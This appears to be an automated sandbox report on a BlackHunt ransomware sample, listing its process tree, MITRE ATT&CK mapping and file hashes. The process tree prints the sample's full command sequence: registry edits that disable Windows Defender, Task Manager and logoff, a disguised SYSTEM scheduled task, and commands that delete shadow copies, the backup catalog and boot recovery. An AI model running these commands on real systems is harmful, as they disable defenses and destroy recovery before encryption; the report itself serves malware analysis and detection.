C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1336
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2140
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2460
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2380
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2336
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2536
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1204
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe" /F2⤵PID:1376
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe" /F3⤵
- Creates scheduled task(s)
PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2648
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3032
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1512
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2948
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2768
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2788
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2884
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2588
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2596
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2916
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2352
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1616
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:916
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5186826a2841aedbbb75210c33bc5dacc
SHA1bd76bb2a551de2e96fb96770cf492d6ee636c35e
SHA2560fb7f4eed2356106836bdd08be6859ff9cbed727fb8aafe0c2fa742635d07920
SHA5124865e2357759257853d85a2d891210f3aee002152ad9f5ab02d22635a479b7c3f2bf14b056bf9ee8b0c542cde4db5c0d5506f6ba891912857a0d75f7fdc463b1
-
Filesize
12KB
MD55e8afe0f65e9b7f2f6d59269f3a609a7
SHA102efaa6b3e746f59f60e9d17c6ab44b0e2f33869
SHA256a334a55d74683db2030706d27bdfd48b9d1e48bfe22cf2617b503cfdeb45c6f7
SHA5125c3819d8bc58202208956db7df14f68b8813339500805b8e38c3e88fdd8225ddc96c22667b42a10d704b25ec49e717f7658daaa3494b60ba0ee3ba1b1c2177ef
-
Filesize
684B
MD5b713a410b6e62defe68e02db64b8a967
SHA1809d15e851c16de53fd6f9c6c06f440fd0d13f7a
SHA2564c8d7b32b205db1962276a2422aa7492f98ebe44aa01d3016076d2e9493b8857
SHA51269316ac3fd833a39bb6e2a4c1e28e501157ea37ce2ea896fc7bab38f455750dfffc65f3a2d9ff26b3c96870dbfc9957d8eb6b1ddf3b9a35e79d8eca8ebcb9b40